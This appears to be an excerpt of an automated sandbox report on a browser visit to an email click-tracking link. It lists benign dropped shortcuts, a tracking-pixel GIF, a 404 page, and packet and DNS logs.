            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2677
            Entropy (8bit):3.9924839174575126
            Encrypted:false
            SSDEEP:48:8adesTTHAHy/OidAKZdA1TehDiZUkwqehNlxy+R:8BsfTVxy
            MD5:38F79B9008042961E97713D1CD6E564C
            SHA1:3D6E210690AB95AAA0A559D307EBE4C04103F8FD
            SHA-256:D14C1E151707F6F27704B40D340654EFD424300A342FA6AC25845A44D77B25F6
            SHA-512:AA4FF1D1C26F1978F91ADF1A6EDE26878878C899B1FF16B76BC3B2AA2969C44DA9ED89C13B7B15BFA5BB8D1A6D10CB4412143BC292C36EE46154660A462F79B3
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,......V.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2677
            Entropy (8bit):3.9824083545426694
            Encrypted:false
            SSDEEP:48:8jdesTTHAHy/OidAKZdA1dehBiZUk1W1qehblxy+C:8csfj9hxy
            MD5:67A0D81A5C79A38523957BA67A894BFE
            SHA1:E2DB25067E6C0A36F11ACC9628F38F81FB000BD6
            SHA-256:8F18C62A005FC54C4AC24EFF00E5F012CC015B878FA3519D077ADEB797045C30
            SHA-512:6379201AC62937118D561FFB1CC9A2B4BAFF140A3D44A91988F4D5659B9C6E3DED0E4F8CE3D4DCB786E9B52CF0AB49DA3BF19D068A8D994C98D0A30E2425C7EA
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,......a.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2679
            Entropy (8bit):3.9905352520679047
            Encrypted:false
            SSDEEP:48:8+desTTHAHy/OidAKZdA1duTeehOuTbbiZUk5OjqehOuTbFlxy+yT+:8VsfnTfTbxWOvTbfxy7T
            MD5:E1CA1829723154ABC4FCC45BB4F93B44
            SHA1:E040F6932EAE4F83515FA7C7C81D0C458BEDA369
            SHA-256:8ACA7E0727BE223C3A1AF9A80588FBCC84DDC98D3C9ACD3CE4BFB3DD2A581E05
            SHA-512:716B9145BC316D26F08A13C5F15C3139B8E9542141835640A73E5247E2730A5F8839F168C4E843173C4E13E9DD8F32F0235DAEB3C2522DEAF5CEE0F91F0401B0
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,.....ON.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:GIF image data, version 89a, 1 x 1
            Category:downloaded
            Size (bytes):43
            Entropy (8bit):3.0314906788435274
            Encrypted:false
            SSDEEP:3:CUkwltxlHh/:P/
            MD5:325472601571F31E1BF00674C368D335
            SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
            SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
            SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
            Malicious:false
            Reputation:low
            URL:http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
            Preview:GIF89a.............!.......,...........D..;
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):1245
            Entropy (8bit):5.462849750105637
            Encrypted:false
            SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
            MD5:5343C1A8B203C162A3BF3870D9F50FD4
            SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
            SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
            SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
            Malicious:false
            Reputation:low
            URL:http://click.email.traininng.com/favicon.ico
            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
            No static file info
            TimestampSource PortDest PortSource IPDest IP
            Oct 23, 2024 20:24:31.617561102 CEST49673443192.168.2.16204.79.197.203
            Oct 23, 2024 20:24:31.919245005 CEST49673443192.168.2.16204.79.197.203
            Oct 23, 2024 20:24:32.526228905 CEST49673443192.168.2.16204.79.197.203
            Oct 23, 2024 20:24:33.735340118 CEST49673443192.168.2.16204.79.197.203
            Oct 23, 2024 20:24:34.638408899 CEST4968980192.168.2.16192.229.211.108
            Oct 23, 2024 20:24:35.702516079 CEST4970980192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:35.702734947 CEST4971080192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:35.708003998 CEST804970913.111.71.11192.168.2.16
            Oct 23, 2024 20:24:35.708127022 CEST4970980192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:35.708239079 CEST4970980192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:35.708688974 CEST804971013.111.71.11192.168.2.16
            Oct 23, 2024 20:24:35.708750963 CEST4971080192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:35.713552952 CEST804970913.111.71.11192.168.2.16
            Oct 23, 2024 20:24:36.136229038 CEST49673443192.168.2.16204.79.197.203
            Oct 23, 2024 20:24:36.378110886 CEST804970913.111.71.11192.168.2.16
            Oct 23, 2024 20:24:36.383610964 CEST4970980192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:36.389344931 CEST804970913.111.71.11192.168.2.16
            Oct 23, 2024 20:24:36.389426947 CEST4970980192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:36.485855103 CEST4971080192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:36.491345882 CEST804971013.111.71.11192.168.2.16
            Oct 23, 2024 20:24:36.648236990 CEST804971013.111.71.11192.168.2.16
            Oct 23, 2024 20:24:36.648472071 CEST804971013.111.71.11192.168.2.16
            Oct 23, 2024 20:24:36.649290085 CEST4971080192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:36.649419069 CEST4971080192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:36.655082941 CEST804971013.111.71.11192.168.2.16
            Oct 23, 2024 20:24:36.655143023 CEST4971080192.168.2.1613.111.71.11
            Oct 23, 2024 20:24:37.810636044 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:37.810683966 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:37.810767889 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:37.812273026 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:37.812294960 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:38.681590080 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:38.681664944 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:38.684609890 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:38.684628963 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:38.684936047 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:38.720263958 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:38.767339945 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:38.964184999 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:38.964238882 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:38.964289904 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:38.964364052 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:38.964384079 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:38.964400053 CEST49712443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:38.964410067 CEST44349712184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:39.006521940 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:39.006561041 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:39.006640911 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:39.006875992 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:39.006889105 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:39.570933104 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:39.570965052 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:39.571068048 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:39.571280956 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:39.571293116 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:39.784507990 CEST49678443192.168.2.1620.189.173.10
            Oct 23, 2024 20:24:39.855659962 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:39.855734110 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:39.856784105 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:39.856794119 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:39.856995106 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:39.857939959 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:39.899350882 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:40.088258982 CEST49678443192.168.2.1620.189.173.10
            Oct 23, 2024 20:24:40.105509043 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:40.105608940 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:40.105756998 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:40.106359959 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:40.106375933 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:40.106384993 CEST49713443192.168.2.16184.28.90.27
            Oct 23, 2024 20:24:40.106389999 CEST44349713184.28.90.27192.168.2.16
            Oct 23, 2024 20:24:40.439277887 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:40.439589024 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:40.439614058 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:40.440475941 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:40.440537930 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:40.446351051 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:40.446408987 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:40.486267090 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:40.486323118 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:40.533261061 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:40.693377018 CEST49678443192.168.2.1620.189.173.10
            Oct 23, 2024 20:24:40.948240042 CEST49673443192.168.2.16204.79.197.203
            Oct 23, 2024 20:24:41.904476881 CEST49678443192.168.2.1620.189.173.10
            Oct 23, 2024 20:24:42.445725918 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:42.445768118 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:42.445903063 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:42.447400093 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:42.447416067 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.230622053 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.230783939 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.233344078 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.233362913 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.233648062 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.276262999 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.292931080 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.339328051 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.542313099 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.542340994 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.542347908 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.542356968 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.542382956 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.542403936 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.542422056 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.542464018 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.542566061 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.543363094 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.543411016 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.543421030 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.543442965 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.543492079 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.554375887 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.554395914 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:43.554409981 CEST49715443192.168.2.16172.202.163.200
            Oct 23, 2024 20:24:43.554414988 CEST44349715172.202.163.200192.168.2.16
            Oct 23, 2024 20:24:44.246452093 CEST4968080192.168.2.16192.229.211.108
            Oct 23, 2024 20:24:44.310307980 CEST49678443192.168.2.1620.189.173.10
            Oct 23, 2024 20:24:44.549303055 CEST4968080192.168.2.16192.229.211.108
            Oct 23, 2024 20:24:45.155299902 CEST4968080192.168.2.16192.229.211.108
            Oct 23, 2024 20:24:46.370388985 CEST4968080192.168.2.16192.229.211.108
            Oct 23, 2024 20:24:48.783278942 CEST4968080192.168.2.16192.229.211.108
            Oct 23, 2024 20:24:49.119512081 CEST49678443192.168.2.1620.189.173.10
            Oct 23, 2024 20:24:50.451466084 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:50.451633930 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:50.451709986 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:50.552284956 CEST49673443192.168.2.16204.79.197.203
            Oct 23, 2024 20:24:50.985743046 CEST49714443192.168.2.16142.250.186.36
            Oct 23, 2024 20:24:50.985773087 CEST44349714142.250.186.36192.168.2.16
            Oct 23, 2024 20:24:53.586429119 CEST4968080192.168.2.16192.229.211.108
            Oct 23, 2024 20:24:58.724390984 CEST49678443192.168.2.1620.189.173.10
            Oct 23, 2024 20:25:03.195542097 CEST4968080192.168.2.16192.229.211.108
            Oct 23, 2024 20:25:19.946171999 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:19.946233034 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:19.946356058 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:19.946871042 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:19.946899891 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.708641052 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.708815098 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:20.710566044 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:20.710587025 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.710983992 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.712982893 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:20.759341955 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.964159012 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.964195967 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.964226961 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.964310884 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:20.964385986 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:20.964427948 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:20.964449883 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:20.989515066 CEST4969780192.168.2.16199.232.210.172
            Oct 23, 2024 20:25:20.989609957 CEST4969880192.168.2.16199.232.210.172
            Oct 23, 2024 20:25:20.996105909 CEST8049697199.232.210.172192.168.2.16
            Oct 23, 2024 20:25:20.996190071 CEST4969780192.168.2.16199.232.210.172
            Oct 23, 2024 20:25:20.996196032 CEST8049698199.232.210.172192.168.2.16
            Oct 23, 2024 20:25:20.996246099 CEST4969880192.168.2.16199.232.210.172
            Oct 23, 2024 20:25:21.080699921 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:21.080786943 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:21.080872059 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:21.080913067 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:21.080935001 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:21.080939054 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:21.080992937 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:21.081142902 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:21.081176043 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:21.081198931 CEST49716443192.168.2.16172.202.163.200
            Oct 23, 2024 20:25:21.081207037 CEST44349716172.202.163.200192.168.2.16
            Oct 23, 2024 20:25:39.622951984 CEST49718443192.168.2.16216.58.212.132
            Oct 23, 2024 20:25:39.622999907 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:25:39.623106956 CEST49718443192.168.2.16216.58.212.132
            Oct 23, 2024 20:25:39.623521090 CEST49718443192.168.2.16216.58.212.132
            Oct 23, 2024 20:25:39.623538971 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:25:40.479877949 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:25:40.480268955 CEST49718443192.168.2.16216.58.212.132
            Oct 23, 2024 20:25:40.480302095 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:25:40.481389999 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:25:40.481755018 CEST49718443192.168.2.16216.58.212.132
            Oct 23, 2024 20:25:40.481930971 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:25:40.523438931 CEST49718443192.168.2.16216.58.212.132
            Oct 23, 2024 20:25:50.484721899 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:25:50.484863997 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:25:50.485250950 CEST49718443192.168.2.16216.58.212.132
            Oct 23, 2024 20:25:50.981245995 CEST49718443192.168.2.16216.58.212.132
            Oct 23, 2024 20:25:50.981323957 CEST44349718216.58.212.132192.168.2.16
            Oct 23, 2024 20:26:10.513803959 CEST4970080192.168.2.16192.229.221.95
            Oct 23, 2024 20:26:10.520250082 CEST8049700192.229.221.95192.168.2.16
            Oct 23, 2024 20:26:10.520355940 CEST4970080192.168.2.16192.229.221.95
            TimestampSource PortDest PortSource IPDest IP
            Oct 23, 2024 20:24:34.714340925 CEST53635571.1.1.1192.168.2.16
            Oct 23, 2024 20:24:34.760878086 CEST53543761.1.1.1192.168.2.16
            Oct 23, 2024 20:24:35.653000116 CEST5843953192.168.2.161.1.1.1
            Oct 23, 2024 20:24:35.653194904 CEST6304853192.168.2.161.1.1.1
            Oct 23, 2024 20:24:35.679389954 CEST53630481.1.1.1192.168.2.16
            Oct 23, 2024 20:24:35.701786995 CEST53584391.1.1.1192.168.2.16
            Oct 23, 2024 20:24:35.984704018 CEST53575131.1.1.1192.168.2.16
            Oct 23, 2024 20:24:39.562072992 CEST4979753192.168.2.161.1.1.1
            Oct 23, 2024 20:24:39.562230110 CEST5353153192.168.2.161.1.1.1
            Oct 23, 2024 20:24:39.569964886 CEST53497971.1.1.1192.168.2.16
            Oct 23, 2024 20:24:39.570099115 CEST53535311.1.1.1192.168.2.16
            Oct 23, 2024 20:24:53.034940004 CEST53618701.1.1.1192.168.2.16
            Oct 23, 2024 20:25:11.855343103 CEST53526421.1.1.1192.168.2.16
            Oct 23, 2024 20:25:34.603399038 CEST53620941.1.1.1192.168.2.16
            Oct 23, 2024 20:25:34.716120005 CEST53508251.1.1.1192.168.2.16
            Oct 23, 2024 20:25:35.961344957 CEST138138192.168.2.16192.168.2.255
            Oct 23, 2024 20:25:39.613648891 CEST6282553192.168.2.161.1.1.1
            Oct 23, 2024 20:25:39.613934040 CEST6317453192.168.2.161.1.1.1
            Oct 23, 2024 20:25:39.621705055 CEST53628251.1.1.1192.168.2.16
            Oct 23, 2024 20:25:39.622015953 CEST53631741.1.1.1192.168.2.16
            Oct 23, 2024 20:26:02.757611990 CEST53544961.1.1.1192.168.2.16
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Oct 23, 2024 20:24:35.653000116 CEST192.168.2.161.1.1.10xe37Standard query (0)click.email.traininng.comA (IP address)IN (0x0001)false
            Oct 23, 2024 20:24:35.653194904 CEST192.168.2.161.1.1.10x8afeStandard query (0)click.email.traininng.com65IN (0x0001)false
            Oct 23, 2024 20:24:39.562072992 CEST192.168.2.161.1.1.10x6ed7Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Oct 23, 2024 20:24:39.562230110 CEST192.168.2.161.1.1.10xb417Standard query (0)www.google.com65IN (0x0001)false
            Oct 23, 2024 20:25:39.613648891 CEST192.168.2.161.1.1.10x5948Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Oct 23, 2024 20:25:39.613934040 CEST192.168.2.161.1.1.10x83f0Standard query (0)www.google.com65IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Oct 23, 2024 20:24:35.679389954 CEST1.1.1.1192.168.2.160x8afeNo error (0)click.email.traininng.comclick.virt.s11.exacttarget.comCNAME (Canonical name)IN (0x0001)false
            Oct 23, 2024 20:24:35.701786995 CEST1.1.1.1192.168.2.160xe37No error (0)click.email.traininng.comclick.virt.s11.exacttarget.comCNAME (Canonical name)IN (0x0001)false
            Oct 23, 2024 20:24:35.701786995 CEST1.1.1.1192.168.2.160xe37No error (0)click.virt.s11.exacttarget.com13.111.71.11A (IP address)IN (0x0001)false
